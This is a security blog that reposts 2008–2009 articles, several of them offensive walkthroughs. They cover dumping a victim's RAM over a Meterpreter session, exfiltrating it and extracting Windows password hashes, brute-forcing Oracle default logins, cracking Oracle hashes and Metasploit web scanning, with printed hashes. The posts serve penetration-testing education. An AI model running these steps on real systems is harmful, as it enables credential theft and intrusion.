Jeff’s Blog

This is NOT my content!! It is content I found interesting in my Google Reader Feeds

Dumping Memory to Extract Password Hashes

Originally posted on Attack Research

Dumping memory with MDD using Meterpreter

adapted from: http://pauldotcom.com/wiki/index.php/Episode142

ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Example:

C:\tools\mdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)
0 map operations failed

took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image" . MDD function is limited to copying physical memory, so you will have to utilize another tool to analyze the memory image.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

Execute MDD to capture RAM on the victim machine.

meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144

Optionally we can just use execute to run the tool without opening a command prompt, really doesnt matter as we are going to be pulling down 256+ MB of data we wont exactly be "stealthy"

meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.

Verify memory image has been captured.

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd

meterpreter >

Now that we have our .dd image locally you can utilize instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to grab the passwords out of memory.

Volatility --> https://www.volatilesystems.com/default/volatility

Installation and getting started: Download and unzip volatility from the above location, download and install the patches from http://moyix.blogspot.com/2009/01/registry-code-updates.html --> http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip You will need to overwrite your existing forensics, memory_objects, and memory_plugins folders. Once you are done when you run python volatility you should have the hivescan/hivelist options as well as other stuff.

$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree

Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry
memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. Run hivescan to get hive offsets

$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38

2. Run hivelist with the first hivescan offset

$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60 \WINDOWS\system32\config\software
0xe1a5a7e8 \WINDOWS\system32\config\default
0xe165cb60 \WINDOWS\system32\config\SAM
0xe1a4f770 \WINDOWS\system32\config\SECURITY
0xe1559b38 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Find Password Hash (-y System Hive Offset)(-s SAM Hive

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Couple of updates

1. This technique only works on XP SP2 & SP3, no Vista, no Server 2003

2. New home for volreg plugins: http://www.cc.gatech.edu/%7Ebrendan/volatility/

Posted: March 8th, 2009 under syndicated security.
Comments: none

Advanced Windows Kernel Debugging with VMWare and IDA's GDB debugger

We have already published short tutorial on Windows kernel debugging with IDA and VMWare on our site, but the debugging experience can still be improved.

VMWare's GDB stub is very basic, it doesn't know anything about processes or threads (for Windows guests), so for anything high-level we'll need to do some extra work. We will show how to get the loaded module list and load symbols for all them using IDAPython.

Preparing VM for debugging

Let's assume that you already have a VM with Windows (32-bit) installed. Before starting the debugging, copy files for which you want to see symbols to the host. If you're not sure, copy nt*.exe and hal.dll from System32, and the whole System32\drivers directory.

Edit the VM's .vmx file to enable GDB debugger stub:

Add these lines to the file:

debugStub.listen.guest32 = "TRUE"
debugStub.hideBreakpoints= "TRUE"

Save the file.

In VMWare, click "Power on this virtual machine" or click the green Play button on the toolbar.

Wait until the VM boots.

Debugging in IDA

Start IDA.

If you get the welcome dialog, choose "Go".

Choose Debugger | Attach | Remote GDB debugger.

Enter "localhost" for hostname and 8832 for the port number.

Choose <attach to the process started on target> and click OK.

The execution should stop somewhere in the kernel (address above 0x80000000). You can step through the code, but it's not very convenient without any names. Let's try to gather some more information.

Getting the module list

The list of kernel modules is stored in the list pointed to by the PsLoadedModuleList symbol in the kernel. To find its address, we will use the so-called "KPCR trick". KPCR stands for Kernel Processor Control Region. It is used by the kernel to store various information about each processor. It is placed at the base of the segment pointed to by the fs register (similar to TEB in user mode). One of the fields in it is KdVersionBlock which points to a structure used by the kernel debugger. It, in turn, has various pointers to kernel structures, including PsLoadedModuleList.

Definition of the KPCR structure can be found in many places, including IDA's ntddk.til. Right now we just need to know that KdVersionBlock field is situated at offset 0x34 from the start of KPCR. It points to DBGKD_GET_VERSION64, which has PsLoadedModuleList pointer at offset 0x18.

Let's write a small Python function to find the value of that pointer. To retrieve the base of the segment pointed to by fs, we can use the VMWare's debug monitor "r" command. GDB debugger plugin registers an IDC function SendGDBMonitor() to send commands to the monitor, and we can use IDAPython's Eval() function to call it:

fs_str = Eval('SendGDBMonitor("r fs")')

Returned string has the following format:

fs 0x30 base 0x82744a00 limit 0x00002008 type 0x3 s 1 dpl 0 p 1 db 1

We need the address specified after "base":

kpcr = int(fs_str[13:23], 16) #extract and convert as base 16 (hexadecimal) number

Then get the value of KdVersionBlock:

kdversionblock = Dword(kpcr+0x34)

And finally PsLoadedModuleList:

PsLoadedModuleList = Dword(kdversionblock+0x18)

Walking the module list

PsLoadedModuleList is declared as PLIST_ENTRY. LIST_ENTRY is a structure which represents a member of a double-linked list:

typedef struct _LIST_ENTRY
{
     PLIST_ENTRY Flink;
     PLIST_ENTRY Blink;
} LIST_ENTRY, *PLIST_ENTRY;

So, we just need to follow the Flink pointer until we come back to where we started. A single entry of the list has the following structure:

struct LDR_MODULE
{
  LIST_ENTRY InLoadOrderModuleList;
  LIST_ENTRY InMemoryOrderModuleList;
  LIST_ENTRY InInitializationOrderModuleList;
  PVOID BaseAddress;
  PVOID EntryPoint;
  ULONG SizeOfImage;
  UNICODE_STRING FullDllName;
  UNICODE_STRING BaseDllName;
  ULONG Flags;
  SHORT LoadCount;
  SHORT TlsIndex;
  LIST_ENTRY HashTableEntry;
  ULONG TimeDateStamp;
};

Now we can write a small function to walk this list and create a segment for each module:

#get the first module
cur_mod = Dword(PsLoadedModuleList)
while cur_mod != PsLoadedModuleList and cur_mod != BADADDR:
  BaseAddress  = Dword(cur_mod+0x18)
  SizeOfImage  = Dword(cur_mod+0x20)
  FullDllName  = get_unistr(cur_mod+0x24)
  BaseDllName  = get_unistr(cur_mod+0x2C)
  #create a segment for the module
  SegCreate(BaseAddress, BaseAddress+SizeOfImage, 0, 1, saRelByte, scPriv)
  #set its name
  SegRename(BaseAddress, BaseDllName)
  #get next entry
  cur_mod = Dword(cur_mod)

Loading symbols

Having the module list is nice, but not very useful without symbols. We can load the symbols manually for each module using File | Load File | PDB file... command, but it would be better to automate it.

For that we can use the PDB plugin. From looking at its sources (available in the SDK), we can see that it supports three "call codes":

//call_code==0: user invoked 'load pdb' command, load pdb for the input file
//call_code==1: ida decided to call the plugin itself
//call_code==2: load pdb for an additional exe/dll
//              load_addr: netnode("$ pdb").altval(0)
//              dll_name:  netnode("$ pdb").supstr(0)

Call code 2 looks just like what we need. However, current IDAPython includes a rather basic implementation of netnode class and it is not possible to set supvals from Python. However, if we look at handling of the other call codes, we can see that the plugin retrieves module base from "$ PE header" netnode and module path using get_input_file_path() function. IDAPython's netnode.altset() function does work, and we can use set_root_filename() to set the input file path. Also, if we pass a call code 3, we will avoid the "Do you want to load the symbols?" prompt.

#new netnode instance
penode = idaapi.netnode()
#create netnode the in database if necessary
penode.create("$PE header")
#set the imagebase (-2 == 0xFFFFFFFE)
penode.altset(0xFFFFFFFE, BaseAddress)
#set the module filename
idaapi.set_root_filename(filename)
#run the plugin
RunPlugin("pdb",3)

However, we need to replace the kernel-mode path by the local path beforehand:

#path to the local copy of System32 directory
local_sys32 = r"D:\VmWareShared\w7\System32"
if FullDllName.lower().startswith(r"\systemroot\system32"):
#translate into local filename
filename = local_sys32 + FullDllName[20:]

Now we can gather all pieces into a single script. Download it here

After running it, you should have a nice memory map:

...and name list:

Looks much better now. Happy debugging!

Posted: February 19th, 2009 under syndicated security.
Comments: none

A Cheap, Distributed Zero-Day Defense?

coondoggie writes "Shutting down zero-day computer attacks could be carried out inexpensively by peer-to-peer software that shares information about anomalous behavior, say researchers at the University of California at Davis.The software would interact with existing personal firewalls and intrusion detection systems to gather data about anomalous behavior, says Senthil Cheetancheri, the lead researcher on the project he undertook as a grad student at UC Davis from 2004 to 2007. He now works for SonicWall."

The Malware Challenge

malware

Our own [Anthony Lineberry] has written up his experience participating in the 2008 Malware Challenge as part of his work for Flexilis. The contest involved taking a piece of provided malware, doing a thorough analysis of its behavior, and reporting the results. This wasn’t just to test the chops of the researchers, but also to demonstrate to network/system administrators how they could get into malware analysis themselves.

[Anthony] gives a good overview of how he created his entry (a more detailed PDF is here). First, he unpacked the malware using Ollydbg. Packers are used to obfuscate the actual malware code so that it’s harder for antivirus to pick it up. After taking a good look at the assembly, he executed the code. He used Wireshark to monitor the network traffic and determine what URL the malware was trying to reach. He changed the hostname to point at an IRC server he controlled. Eventually he would be able to issue botnet control commands directly to the malware. We look forward to seeing what next year’s contest will bring.

Posted: January 3rd, 2009 under syndicated security.
Comments: none

Good Nessus 3 PCI scanning video

Thereâ€™s a good video on scanning for PCI compliance with Nessus 3 over at The Academy.Â Go take a look.

BTW,Â thereâ€™s a lot of other good stuff over there as well.Â Peter and that group have put together a lot of great content that is relevant.Â Browse around while you are there.

Vet

Posted: December 11th, 2008 under syndicated security.
Comments: none

Metasploit and WMAP

What is WMAP

"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."

Getting it all up & running

Readme is here:
http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt

Step 1: Download, patch, and install ratproxy
http://code.google.com/p/ratproxy/

Documentation: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Code (at time of this posting): http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz

Step 2: Run ratproxy and browse the site you are targeting, this will populate the database you will use/need for wmap.

**You'll need to create the database first.

msf > db_create wmaptest.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmaptest.db

Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmaptest.db
[*] Successfully connected to the database
[*] File: wmaptest.db

Show the targets. This is populated by browsing a site with ratproxy.

msf > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-p Print all available targets
-r Reload targets table
-s [id] Select target for testing

msf > wmap_targets -r
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0
[*] Done.

Select a target and run the print command again to ensure the right target was selected.

msf > wmap_targets -s 1
Host Port SSL
[*] => 1. 192.168.0.100 80
[*] 2. 64.233.187.99 80
[*] Done.

Display the website structure.

msf > wmap_website
[*] Website structure
[*] 192.168.0.100:80 SSL:0
ROOT_TREE
| web
| | css
| | +------gonav.css
| | web
| | | images
| | | +------storepic_4.jpg
| | | +------storepic_264.jpg
| | | +------20080717105615.jpg
| | | +------storepic_125.jpg
| | +------index.php
| | | pic
| | | | part
| | | | +------index_line_1.gif
| | | +------top_index.gif
| | | +------username.gif
| | | +------tail_bg.gif
| | | +------head_bg.gif
| | | +------login_bg.gif
[*] Done.

[*] Usage: wmap_run [options]
-h Display this help text
-t Show all matching exploit modules
-e Launch exploits against all matched targets

Show the available modules for wmap

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.30465912818909 seconds.
[*] Done.

Run wmap, go get a (rum &) coke because the bruteforce directory modules are going to take awhile.

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 192.168.0.100:80
[*] Error: 192.168.0.100
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80/ may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 192.168.0.100:80
[*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
[*] Launching auxiliary/scanner/http/options WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80 is running Apache/2.2.3 (CentOS)
[*] FrontPage not found on http://192.168.0.100:80 [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against 192.168.0.100:80...
[-] Blank or default PATH set.
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against 192.168.0.100:80...

---SNIP---

msf > wmap_reports
[*] Usage: wmap_reports [options]
-h Display this help text
-p Print all available reports
-s [id] Select report for display

Show available reports.

msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)
1. Sat Nov 22 22:37:04 -0500 2008 192.168.0.100,80,0
[*] Done.

Show your report.

msf > wmap_reports -s 1
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.

Finish your pwnage...errr pentest.

Posted: November 24th, 2008 under syndicated security.
Comments: none

Oracle Pwnage Part 5 — Password Cracking with JTR

Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...

Posted: November 23rd, 2008 under syndicated security.
Comments: none

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thank MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.102.130 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

Posted: November 22nd, 2008 under syndicated security.
Comments: none

Metasploit Adobe util.printf() Client-side Exploit Video

A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.

Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You also click the link below the video for bigger view.

Posted: November 21st, 2008 under syndicated security.
Comments: none

Oracle Pwnage Part 3

Sorry no metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second thing was that you may find yourself with some oracle hashes after some crafty (well not realy) sql queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com
